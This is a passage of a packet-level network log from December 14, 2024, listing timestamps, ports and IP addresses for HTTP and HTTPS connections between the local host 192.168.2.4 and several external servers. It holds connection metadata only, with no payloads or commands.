Dec 14, 2024 12:56:17.701435089 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.701486111 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.702193022 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.702263117 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.702316046 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.702368021 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.703385115 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.703438997 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.703489065 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.703542948 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.704570055 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.704602957 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.704657078 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.704657078 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.705751896 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.705801010 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.705926895 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.705979109 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.707036018 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.707062960 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.707092047 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.707124949 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.708141088 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.708198071 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.708216906 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.708267927 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.709311008 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.709364891 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.709412098 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.709462881 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.710529089 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.710592985 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.710606098 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.710649014 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.711678982 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.711750031 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.711807013 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.711863041 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.712840080 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.712892056 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.712941885 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.712995052 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.714046001 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.714099884 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.714143991 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.714195013 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.715225935 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.715279102 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.715331078 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.715385914 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.716382980 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.716435909 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.716468096 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.716521025 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.717622042 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.717684031 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.717720985 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.717793941 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.718745947 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.718806982 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.718857050 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.718910933 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.720076084 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.720141888 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.720175982 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.720225096 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.721327066 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.721390009 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.721406937 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.721460104 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.722290993 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.722354889 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.722428083 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.722481966 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.724246979 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.724303007 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.724482059 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.724534035 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.725224018 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.725279093 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.725307941 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.725359917 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.726082087 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.726138115 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.726238012 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.726291895 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.727123022 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.727170944 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.727180958 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.727226019 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.728247881 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.728303909 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.728355885 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.728408098 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.729398012 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.729454994 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.729521036 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.729573965 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.730659962 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.730712891 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.730721951 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.730773926 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.731790066 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.731846094 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.861968994 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.862032890 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.862088919 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.862229109 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.862380028 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.862406015 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.862431049 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.862462997 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.863461018 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.863512993 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.863557100 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.863609076 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.864661932 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.864718914 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.864743948 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.864788055 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.865729094 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.865797997 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:18.701920033 CET	443	49783	104.21.22.222	192.168.2.4
Dec 14, 2024 12:56:18.702117920 CET	443	49783	104.21.22.222	192.168.2.4
Dec 14, 2024 12:56:18.702332973 CET	49783	443	192.168.2.4	104.21.22.222
Dec 14, 2024 12:56:18.702435017 CET	49783	443	192.168.2.4	104.21.22.222
Dec 14, 2024 12:56:18.702435017 CET	49783	443	192.168.2.4	104.21.22.222
Dec 14, 2024 12:56:18.702505112 CET	443	49783	104.21.22.222	192.168.2.4
Dec 14, 2024 12:56:18.702537060 CET	443	49783	104.21.22.222	192.168.2.4
Dec 14, 2024 12:56:19.018990993 CET	49789	443	192.168.2.4	104.21.96.1
Dec 14, 2024 12:56:19.019047022 CET	443	49789	104.21.96.1	192.168.2.4
Dec 14, 2024 12:56:19.022094011 CET	49789	443	192.168.2.4	104.21.96.1
Dec 14, 2024 12:56:19.022520065 CET	49789	443	192.168.2.4	104.21.96.1
Dec 14, 2024 12:56:19.022557974 CET	443	49789	104.21.96.1	192.168.2.4
Dec 14, 2024 12:56:20.079801083 CET	49772	80	192.168.2.4	185.215.113.43
Dec 14, 2024 12:56:20.079942942 CET	49794	80	192.168.2.4	185.215.113.43
Dec 14, 2024 12:56:20.200287104 CET	80	49794	185.215.113.43	192.168.2.4
Dec 14, 2024 12:56:20.200305939 CET	80	49772	185.215.113.43	192.168.2.4
Dec 14, 2024 12:56:20.200357914 CET	49794	80	192.168.2.4	185.215.113.43
Dec 14, 2024 12:56:20.200516939 CET	49772	80	192.168.2.4	185.215.113.43
Dec 14, 2024 12:56:20.200715065 CET	49794	80	192.168.2.4	185.215.113.43
Dec 14, 2024 12:56:20.247457027 CET	443	49789	104.21.96.1	192.168.2.4
Dec 14, 2024 12:56:20.247560978 CET	49789	443	192.168.2.4	104.21.96.1
Dec 14, 2024 12:56:20.299602032 CET	49789	443	192.168.2.4	104.21.96.1
Dec 14, 2024 12:56:20.299633026 CET	443	49789	104.21.96.1	192.168.2.4
Dec 14, 2024 12:56:20.300640106 CET	443	49789	104.21.96.1	192.168.2.4
Dec 14, 2024 12:56:20.320662975 CET	80	49794	185.215.113.43	192.168.2.4
Dec 14, 2024 12:56:20.337086916 CET	49789	443	192.168.2.4	104.21.96.1
Dec 14, 2024 12:56:20.337086916 CET	49789	443	192.168.2.4	104.21.96.1
Dec 14, 2024 12:56:20.337285995 CET	443	49789	104.21.96.1	192.168.2.4
Dec 14, 2024 12:56:21.551240921 CET	80	49794	185.215.113.43	192.168.2.4
Dec 14, 2024 12:56:21.551359892 CET	49794	80	192.168.2.4	185.215.113.43
Dec 14, 2024 12:56:21.562944889 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:21.563235998 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:21.683231115 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:21.683247089 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:21.683280945 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:21.683299065 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:21.683790922 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:21.803525925 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:21.881747007 CET	443	49789	104.21.96.1	192.168.2.4
Dec 14, 2024 12:56:21.881979942 CET	443	49789	104.21.96.1	192.168.2.4
Dec 14, 2024 12:56:21.882033110 CET	49789	443	192.168.2.4	104.21.96.1
Dec 14, 2024 12:56:21.882078886 CET	49789	443	192.168.2.4	104.21.96.1
Dec 14, 2024 12:56:21.882100105 CET	443	49789	104.21.96.1	192.168.2.4
Dec 14, 2024 12:56:21.882124901 CET	49789	443	192.168.2.4	104.21.96.1
Dec 14, 2024 12:56:21.882131100 CET	443	49789	104.21.96.1	192.168.2.4
Dec 14, 2024 12:56:23.014734983 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.014760017 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.014775991 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.014807940 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.014823914 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.014839888 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.014858007 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.015017033 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.015017033 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.015079975 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.015096903 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.015113115 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.015161037 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.015161037 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.135415077 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.135432959 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.135495901 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.135495901 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.207129002 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.207154036 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.207271099 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.207271099 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.211179972 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.211203098 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.211366892 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.217413902 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.217760086 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.218204021 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.225965977 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.225991964 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.226593018 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.234340906 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.234365940 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.234428883 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.242870092 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.242894888 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.242934942 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.242934942 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.251081944 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.251158953 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.251331091 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.259409904 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.259478092 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.261831045 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.268192053 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.268215895 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.268691063 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.276433945 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.276458025 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.276561975 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.285775900 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.285821915 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.286262989 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.398854971 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.398884058 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.398916960 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.398953915 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.401298046 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.401344061 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.402579069 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.402631044 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.402735949 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.402782917 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.407016039 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.407064915 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.407213926 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.407255888 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.412209988 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.412233114 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.412358999 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.412358999 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.417098999 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.417119980 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.417315006 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.417315006 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.422203064 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.422239065 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.422394991 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.422394991 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.426745892 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.426789045 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.426793098 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.426836014 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.431649923 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.431704998 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.431826115 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.431826115 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.436561108 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.436585903 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.436614990 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.436655045 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.441342115 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.441368103 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.441396952 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.441436052 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.445924044 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.445987940 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.446291924 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.446332932 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.451172113 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.451196909 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.451239109 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.451534986 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.455729008 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.455746889 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.455774069 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.455789089 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.460594893 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.460622072 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.460647106 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.460669041 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.465148926 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.465209961 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.465399027 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.465451956 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.470602036 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.470659018 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.471020937 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.471084118 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.474827051 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.474874973 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.474903107 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.474998951 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.544545889 CET	49804	443	192.168.2.4	23.55.153.106
Dec 14, 2024 12:56:23.544579983 CET	443	49804	23.55.153.106	192.168.2.4
Dec 14, 2024 12:56:23.544640064 CET	49804	443	192.168.2.4	23.55.153.106
Dec 14, 2024 12:56:23.545911074 CET	49804	443	192.168.2.4	23.55.153.106
Dec 14, 2024 12:56:23.545928001 CET	443	49804	23.55.153.106	192.168.2.4
Dec 14, 2024 12:56:23.590768099 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.590790033 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.590816975 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.590845108 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.591921091 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.591959953 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.591964006 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.591990948 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.596107960 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.596152067 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.596231937 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.596280098 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.600092888 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.600136995 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.600148916 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.600194931 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.604074955 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.604140997 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.604413033 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.604456902 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.608154058 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.608180046 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.608198881 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.608211994 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.611682892 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.611799002 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.611989975 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.612030983 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.616086006 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.616111040 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.616126060 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.616147995 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.619471073 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.619496107 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.619523048 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.619537115 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.623673916 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.623698950 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.623718977 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.623759985 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.627219915 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.627245903 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.627265930 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.627294064 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.630616903 CET	80	49796	185.215.113.16	192.168.2.4
